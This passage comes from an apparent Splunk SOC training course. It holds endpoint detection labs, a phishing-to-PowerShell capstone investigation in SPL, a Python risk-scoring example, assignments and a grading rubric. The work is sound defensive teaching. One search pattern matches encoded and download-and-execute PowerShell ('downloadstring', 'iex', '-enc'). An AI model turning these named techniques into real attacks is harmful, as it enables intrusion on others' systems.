Lab 4.2 - Office Application Spawning Script Interpreter
index=endpoint_security
(parent_process_name="winword.exe" OR parent_process_name="excel.exe" OR parent_process_name="outlook.exe")
(process_name="powershell.exe" OR process_name="cmd.exe" OR process_name="wscript.exe" OR process_name="mshta.exe")
| table _time host user parent_process_name process_name command_line
Lab 4.3 - New Service Installation
index=endpoint_security EventCode=7045
| table _time host user service_name service_file_name
Lab 4.4 - Privileged User Group Change
index=endpoint_security EventCode IN (4728,4732)
| table _time host user member_name group_name
Lab 4.5 - Linux SSH Brute Force
index=endpoint_security sourcetype=linux_secure "Failed password"
| rex "from (?<src_ip>\d+\.\d+\.\d+\.\d+)"
| stats count by src_ip, host
| where count > 10
| sort -count
Lab 4.6 - Suspicious Linux Sudo Activity
index=endpoint_security sourcetype=linux_secure sudo
| stats count values(command) as commands by user, host
| sort -count
Lab 4.7 - Endpoint Investigation Dashboard
Create panels:
| Panel | Purpose |
|---|---|
| Top suspicious processes | Malware behavior |
| PowerShell activity | Script abuse |
| Failed logins by host | Brute force |
| New services installed | Persistence |
| Privilege changes | Account abuse |
| Endpoint risk by host | SOC prioritization |
Day 4 Deliverables
Students should produce:
- Endpoint detection search pack
- Windows endpoint dashboard
- Linux endpoint dashboard
- Endpoint investigation playbook
- MITRE ATT&CK mapping for endpoint detections
Day 5 - Integrated SOC Capstone: Email + SIEM + Endpoint Security
Theme
Students complete a realistic SOC investigation from phishing email to endpoint compromise and SIEM reporting.
Learning Objectives
By the end of Day 5, students will be able to:
| Objective | Description |
|---|---|
| Investigate full attack chain | Email → user → endpoint → network |
| Correlate logs | Email, endpoint, DNS, proxy, identity |
| Build SIEM alerting | Create detection and response workflow |
| Prioritize risk | Use severity and risk scoring |
| Document incident | Prepare SOC report |
| Present findings | Explain timeline, impact, response |
Capstone Scenario
Scenario Name
Phishing Email Leading to Endpoint Compromise
Story
A user receives an email with the subject:
Urgent: Password Verification Required
The user clicks a suspicious URL. Shortly after, the endpoint executes PowerShell with an encoded command. The host then communicates with an unknown external IP address. The SOC must investigate and determine whether the incident is a true positive.
Data Sources Used
| Data Source | Purpose |
|---|---|
| Email logs | Identify phishing email |
| Endpoint logs | Detect malicious process |
| Windows logs | Validate user and host activity |
| DNS logs | Identify suspicious domain lookup |
| Proxy logs | Confirm URL access |
| Threat intel | Check IOC reputation |
| SIEM alerts | Prioritize and report |
Morning Session: Guided Capstone Build
Step 1 - Identify Suspicious Email
index=email_security
(subject="*Password Verification*" OR subject="*Urgent*")
| table _time sender recipient subject url attachment_name verdict action
Step 2 - Find All Recipients
index=email_security subject="*Password Verification*"
| stats values(recipient) as recipients dc(recipient) as recipient_count by sender, subject, url
Step 3 - Identify Clicked URL
index=proxy OR index=email_security url=*
| search url="*verification*"
| table _time user src_ip url action
Step 4 - Pivot to Endpoint
index=endpoint_security user="victim.user"
| table _time host user process_name parent_process_name command_line
Step 5 - Detect Suspicious PowerShell
index=endpoint_security user="victim.user" process_name="powershell.exe"
| where match(command_line, "(?i)(-enc|downloadstring|iex|bypass)")
| table _time host user parent_process_name process_name command_line
Step 6 - Check External Communication
index=dns OR index=proxy
user="victim.user"
| stats values(query) as domains values(dest_ip) as dest_ips by user, src_ip
Step 7 - Check Threat Intel
index=dns OR index=proxy
| lookup threat_ioc_lookup ioc as query OUTPUT severity type
| where isnotnull(severity)
| table _time user src_ip query type severity
Afternoon Session: Final Project
Students must build the following:
1. Detection Rules
| Detection | Required Logic |
|---|---|
| Phishing email campaign | Same sender/subject sent to many users |
| Suspicious URL click | User clicked suspicious URL |
| Office spawning PowerShell | Outlook/Word/Excel → PowerShell |
| Encoded PowerShell | PowerShell with -enc or suspicious command |
| IOC match | Domain/IP/hash matched threat intel |
| High-risk user | Email + endpoint + IOC activity |
2. Risk Scoring Model
Example:
| Event | Risk Score |
|---|---|
| Malicious email delivered | 20 |
| User clicked URL | 30 |
| Suspicious PowerShell executed | 40 |
| IOC matched | 50 |
| Privileged user involved | 25 |
Final risk logic:
If total risk score >= 80, create high severity notable event.
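The following is an added example (not code from the course page) of the risk logic above, and of the Day 2 "Risk-Based Alerting" section, running over constructed detection events. Each detection adds its score to the user it concerns, a privileged user adds the bonus, scores are summed over a sliding window, and a notable is opened when the total reaches 80 with the contributing detections attached. One practical rule is included that the table does not state: the same detection firing repeatedly on the same host counts once per window, otherwise a single noisy rule inflates the score on its own. The 24-hour window, the privileged-user list and the events are assumptions.

```python
"""Risk-based alerting: accumulate per-user risk and open a notable.

Added example, not code from the course page. Scores and threshold follow the
capstone table; the window, the privileged-user list and the events are
assumptions and constructed data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RISK_SCORES = {
    "malicious_email_delivered": 20,
    "url_clicked": 30,
    "suspicious_powershell": 40,
    "ioc_match": 50,
}
PRIVILEGED_USER_BONUS = 25
PRIVILEGED_USERS = {"admin.jane"}   # assumption
THRESHOLD = 80
WINDOW = timedelta(hours=24)        # assumption


def score_event(ev):
    score = RISK_SCORES[ev["detection"]]
    if ev["user"] in PRIVILEGED_USERS:
        score += PRIVILEGED_USER_BONUS
    return score


def contributing_events(evs, now, window):
    """Events within the window ending at `now`, counting each (detection, host) once."""
    seen, out = set(), []
    for e in evs:
        t = datetime.fromisoformat(e["_time"])
        if t > now or now - t > window:
            continue
        key = (e["detection"], e["host"])
        if key not in seen:
            seen.add(key)
            out.append(e)
    return out


def windowed_risk(events, user, at_time):
    """Deduplicated risk total for `user` over the window ending at `at_time` (ISO string)."""
    evs = sorted((e for e in events if e["user"] == user), key=lambda e: e["_time"])
    return sum(score_event(e) for e in contributing_events(evs, datetime.fromisoformat(at_time), WINDOW))


def build_notables(events, threshold=THRESHOLD, window=WINDOW):
    """One notable per user, opened at the first event that lifts the windowed
    risk total to the threshold."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["_time"]):
        by_user[ev["user"]].append(ev)
    notables = []
    for user, evs in by_user.items():
        for ev in evs:
            now = datetime.fromisoformat(ev["_time"])
            contrib = contributing_events(evs, now, window)
            total = sum(score_event(e) for e in contrib)
            if total >= threshold:
                notables.append({
                    "user": user,
                    "risk_score": total,
                    "triggered_at": ev["_time"],
                    "detections": [e["detection"] for e in contrib],
                    "hosts": sorted({e["host"] for e in contrib}),
                })
                break  # later events would be appended to this notable
    return notables


# Constructed detection events, one row per detection that fired.
SAMPLE_RISK_EVENTS = [
    {"_time": "2024-05-01T09:02:00", "user": "victim.user", "host": "WS01", "detection": "malicious_email_delivered"},
    {"_time": "2024-05-01T09:05:00", "user": "victim.user", "host": "WS01", "detection": "url_clicked"},
    {"_time": "2024-05-01T09:06:00", "user": "victim.user", "host": "WS01", "detection": "suspicious_powershell"},
    {"_time": "2024-05-01T09:06:30", "user": "victim.user", "host": "WS01", "detection": "suspicious_powershell"},
    # bob: an IOC match eleven days earlier falls outside the window
    {"_time": "2024-04-20T11:00:00", "user": "bob", "host": "WS02", "detection": "ioc_match"},
    {"_time": "2024-05-01T12:00:00", "user": "bob", "host": "WS02", "detection": "malicious_email_delivered"},
    # admin.jane: privileged, so email plus click alone crosses the threshold
    {"_time": "2024-05-01T13:00:00", "user": "admin.jane", "host": "WS03", "detection": "malicious_email_delivered"},
    {"_time": "2024-05-01T13:10:00", "user": "admin.jane", "host": "WS03", "detection": "url_clicked"},
]

if __name__ == "__main__":
    for notable in build_notables(SAMPLE_RISK_EVENTS):
        print(notable)
```

victim.user crosses the threshold at the PowerShell event with a score of 90 and the full email → click → PowerShell chain attached; bob stays at 20 because the old IOC match has aged out; admin.jane reaches 100 on two events because of the privileged-user bonus.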
3. SOC Dashboard
Required panels:
| Panel | Description |
|---|---|
| Active security incidents | Current high-risk alerts |
| Email threat summary | Phishing, malware, spam |
| Top targeted users | Users receiving suspicious emails |
| Endpoint compromise indicators | Suspicious process and command line |
| Threat intel matches | IOC activity |
| Incident timeline | Full attack chain |
4. Incident Report
Students must prepare a final incident report with:
| Section | Required Content |
|---|---|
| Executive Summary | What happened |
| Timeline | When each event occurred |
| Affected Users | Who was targeted |
| Affected Hosts | Which systems were involved |
| IOCs | Domains, IPs, hashes, URLs |
| Evidence | SPL results and screenshots |
| Severity | Low/Medium/High/Critical |
| Root Cause | How attack started |
| Impact | What was compromised or attempted |
| Response Actions | Quarantine, block, disable, reset |
| Lessons Learned | Detection and prevention improvements |
Day 5 Deliverables
Students should submit:
- Final SOC dashboard
- Detection rule pack
- Risk scoring logic
- Incident investigation timeline
- Final incident report
- Presentation of findings
Complete 5-Day Agenda Summary
| Day | Main Topic | Core Outcome |
|---|---|---|
| Day 1 | Splunk Security Foundation | Data onboarding, SPL, dashboards, CIM basics |
| Day 2 | SIEM with Splunk Enterprise Security | Correlation searches, notable events, RBA, threat intel |
| Day 3 | Email Security | Phishing detection, malicious URL/attachment analysis |
| Day 4 | Endpoint Security | Windows/Linux endpoint detection and investigation |
| Day 5 | Integrated SOC Capstone | Full attack-chain investigation and final report |
Recommended Practical Assignments
Assignment 1 - SPL Search Practice
Create 10 SPL searches:
- Top email senders
- Top email recipients
- Failed logins by user
- Failed logins by source IP
- Suspicious PowerShell
- New service installed
- Suspicious attachment
- Malicious URL click
- IOC match
- User risk summary
Assignment 2 - Email Security Dashboard
Build a dashboard containing:
- Delivered vs blocked emails
- Top suspicious senders
- Top targeted recipients
- Suspicious attachments
- Suspicious URLs
- Phishing campaign view
Assignment 3 - Endpoint Security Dashboard
Build a dashboard containing:
- Top risky hosts
- Top risky users
- Suspicious PowerShell
- Office spawning command shell
- Failed login trend
- New service installation
Assignment 4 - SIEM Detection Engineering
Create three detections:
| Detection | Severity |
|---|---|
| Brute force followed by success | High |
| Phishing email clicked | High |
| Suspicious PowerShell after email click | Critical |
Assignment 5 - Final SOC Investigation
Investigate one complete incident and submit:
- Timeline
- Evidence
- IOCs
- Affected users
- Affected hosts
- Final verdict
- Recommended response
Final Project Evaluation Rubric
| Area | Weight |
|---|---|
| SPL correctness | 20% |
| SIEM detection quality | 20% |
| Email security investigation | 15% |
| Endpoint investigation | 15% |
| Dashboard quality | 10% |
| Incident report quality | 10% |
| Final presentation | 10% |
Course Outcome
After this 5-day program, students should be able to:
- Use Splunk for real-world SOC investigations.
- Onboard and search email, endpoint, identity, and network logs.
- Build SIEM detections using SPL.
- Investigate phishing and malicious email campaigns.
- Detect suspicious endpoint behavior.
- Correlate email and endpoint events into one attack story.
- Build SOC dashboards and incident reports.
- Understand how Splunk Enterprise Security, SOAR, and Attack Analyzer fit into a modern SOC workflow.
I'm a DevOps/SRE/DevSecOps/Cloud Expert passionate about sharing knowledge and experiences. I have worked at Cotocus. I share tech blogs at DevOps School, travel stories at Holiday Landmark, stock market tips at Stocks Mantra, health and fitness guidance at My Medic Plus, product reviews at TrueReviewNow, and SEO strategies at Wizbrand.